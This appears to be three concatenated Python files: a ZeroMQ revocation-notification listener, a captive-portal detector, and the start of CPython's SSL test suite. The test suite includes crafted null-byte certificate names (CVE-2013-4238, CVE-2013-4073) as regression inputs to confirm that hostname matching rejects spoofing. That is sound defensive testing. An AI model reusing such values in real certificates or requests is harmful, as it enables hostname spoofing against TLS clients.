mysock.setsockopt(zmq.SUBSCRIBE, '')
mysock.connect("tcp://%s:%s"%(config.get('general','revocation_notifier_ip'),config.getint('general','revocation_notifier_port')))
logger.info('Waiting for revocation messages on 0mq %s:%s'%
(config.get('general','revocation_notifier_ip'),config.getint('general','revocation_notifier_port')))
while True:
rawbody = mysock.recv()
body = json.loads(rawbody)
if cert_key is None:
# load up the CV signing public key
if revocation_cert_path is not None and os.path.exists(revocation_cert_path):
logger.info("Lazy loading the revocation certificate from %s"%revocation_cert_path)
with open(revocation_cert_path,'r') as f:
certpem = f.read()
cert_key = crypto.rsa_import_pubkey(certpem)
if cert_key is None:
logger.warning("Unable to check signature of revocation message: %s not available"%revocation_cert_path)
elif str(body['signature'])=='none':
logger.warning("No signature on revocation message from server")
elif not crypto.rsa_verify(cert_key,str(body['msg']),str(body['signature'])):
            logger.error("Invalid revocation message signature %s"%body)
else:
message = json.loads(body['msg'])
logger.debug("Revocation signature validated for revocation: %s"%message)
callback(message)
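# Note (descriptive comment, not part of the original logic): messages on the
# wire are JSON objects with 'msg' and 'signature' fields, where 'msg' is
# itself a JSON string, e.g.
#   {"msg": "{\"cert_serial\": \"1\"}", "signature": "none"}
# main() below exercises the full broker/notify/await path end to end.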
def main():
start_broker()
import secure_mount
def worker():
def print_notification(revocation):
logger.warning("Received revocation: %s"%revocation)
keypath = '%s/unzipped/RevocationNotifier-cert.crt'%(secure_mount.mount())
await_notifications(print_notification,revocation_cert_path=keypath)
t = threading.Thread(target=worker)
t.start()
#time.sleep(0.5)
json_body2 = {
'v': 'vbaby',
'agent_id': '2094aqrea3',
'cloudagent_ip': 'ipaddy',
'cloudagent_port': '39843',
'tpm_policy': '{"ab":"1"}',
'vtpm_policy': '{"ab":"1"}',
'metadata': '{"cert_serial":"1"}',
'ima_whitelist': '{}',
'revocation_key': '',
'revocation': '{"cert_serial":"1"}',
}
print "sending notification"
notify(json_body2)
time.sleep(2)
print "shutting down"
stop_broker()
print "exiting..."
sys.exit(0)
print "done"
if __name__=="__main__":
main()
|
captive_portal.py
|
"""Detect captive portals
Regularly monitor the connection. Ignore captive portals if the connection is
behind a proxy."""
import requests
import threading
import time
import logging
from enum import Enum, auto
check_connection_url = 'http://captive.dividat.com/'
"""
Connection Status
The connection is either behind a proxy, or direct.
"""
class Status(Enum):
DIRECT_DISCONNECTED = auto()
DIRECT_CAPTIVE = auto()
DIRECT_CONNECTED = auto()
PROXY = auto()
def sleep(status):
if status == Status.DIRECT_DISCONNECTED or status == Status.DIRECT_CAPTIVE:
time.sleep(5)
else:
time.sleep(60)
class CaptivePortal():
def __init__(self, get_current_proxy, set_captive_portal_url):
self._status = Status.DIRECT_DISCONNECTED
self._get_current_proxy = get_current_proxy
self._set_captive_portal_url = set_captive_portal_url
def start_monitoring_daemon(self):
thread = threading.Thread(target=self._check, args=[])
thread.daemon = True
thread.start()
def is_captive(self):
return self._status == Status.DIRECT_CAPTIVE
def _check(self):
while True:
proxy = self._get_current_proxy()
if proxy is not None:
self._set_status(Status.PROXY)
else:
try:
                    r = requests.get(check_connection_url, allow_redirects=False)
if r.status_code == 200:
self._set_status(Status.DIRECT_CONNECTED)
elif r.status_code in [301, 302, 303, 307]:
self._set_status(Status.DIRECT_CAPTIVE)
self._set_captive_portal_url(r.headers['Location'])
else:
self._set_status(Status.DIRECT_DISCONNECTED)
except requests.exceptions.RequestException as e:
self._set_status(Status.DIRECT_DISCONNECTED)
logging.error('Connection request exception: ' + str(e))
except Exception as e:
self._set_status(Status.DIRECT_DISCONNECTED)
logging.error('Connection exception: ' + str(e))
sleep(self._status)
def _set_status(self, status):
self._status = status
if self._status != Status.DIRECT_CAPTIVE:
self._set_captive_portal_url('')
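# Minimal usage sketch (illustrative; the two callbacks are placeholders, not
# part of this module): wire the monitor to a proxy getter and a portal-URL
# setter, then poll is_captive() from the application.
def _example_usage():
    def get_current_proxy():
        return None  # Pretend no proxy is configured.

    def set_captive_portal_url(url):
        logging.info('Captive portal URL: %r', url)

    portal = CaptivePortal(get_current_proxy, set_captive_portal_url)
    portal.start_monitoring_daemon()
    time.sleep(5)  # Let the daemon perform a first check.
    return portal.is_captive()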
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import functools
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Jan 17 19:09:06 2028 GMT',
'notBefore': 'Jan 19 19:09:06 2018 GMT',
'serialNumber': 'F9BA076D5B6ABD9B',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 28 19:09:06 2027 GMT',
'notBefore': 'Jan 19 19:09:06 2018 GMT',
'serialNumber': '82EDBF41C880919C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
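# Illustrative sketch (not part of the original suite): typical use of the
# helper above for a client-side socket that skips certificate verification.
def _example_test_wrap_socket():
    s = socket.socket(socket.AF_INET)
    ss = test_wrap_socket(s, cert_reqs=ssl.CERT_NONE,
                          do_handshake_on_connect=False)
    ss.close()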
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
    server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # a partial wildcard in the first fragment is rejected, even when
        # combined with IDNA A-labels in subsequent fragments.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if hasattr(socket, 'AF_INET6'):
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if hasattr(socket, 'AF_INET6'):
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
